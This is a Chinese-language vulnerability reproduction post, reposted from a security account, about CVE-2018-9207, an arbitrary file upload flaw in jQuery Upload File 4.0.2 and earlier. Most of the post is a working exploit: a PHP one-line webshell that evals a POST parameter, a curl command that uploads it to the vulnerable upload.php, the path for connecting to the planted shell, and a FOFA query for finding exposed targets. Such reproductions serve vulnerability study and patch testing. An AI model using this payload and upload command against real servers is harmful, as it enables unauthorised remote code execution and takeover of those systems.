本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-CVE-2018-9207 jquery Upload File文件上传
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery–upload-file。
![图片[1]--CVE-2018-9207 jquery Upload File文件上传-安全小天地](https://img.godyu.com/2023/12/20231226124832957.png?imageView2/0/format/webp/q/75)
0x03 漏洞复现
漏洞影响: jQuery Upload File <= 4.0.2
FOFA:title=”jquery-upload-file”(暂时没搜到)
1.准备一个一句话木马,取名为shell.php
<?php @eval($_POST[\'ry\']);?>2.kali使用curl在当前一句话木马目录中上传webshell,上传成功
curl -F \"myfile=@shell.php\" \"http://x.x.x.x:31430/jquery-upload-file/php/upload.php\"![图片[2]--CVE-2018-9207 jquery Upload File文件上传-安全小天地](https://img.godyu.com/2023/12/20231226204833551.png?imageView2/0/format/webp/q/75)
3.连接webshell,得到一个shell,密码为ry
http://x.x.x.x:31430/jquery-upload-file/php/uploads/shell.php![图片[3]--CVE-2018-9207 jquery Upload File文件上传-安全小天地](https://img.godyu.com/2023/12/20231226204834193.png?imageView2/0/format/webp/q/75)
THE END
暂无评论内容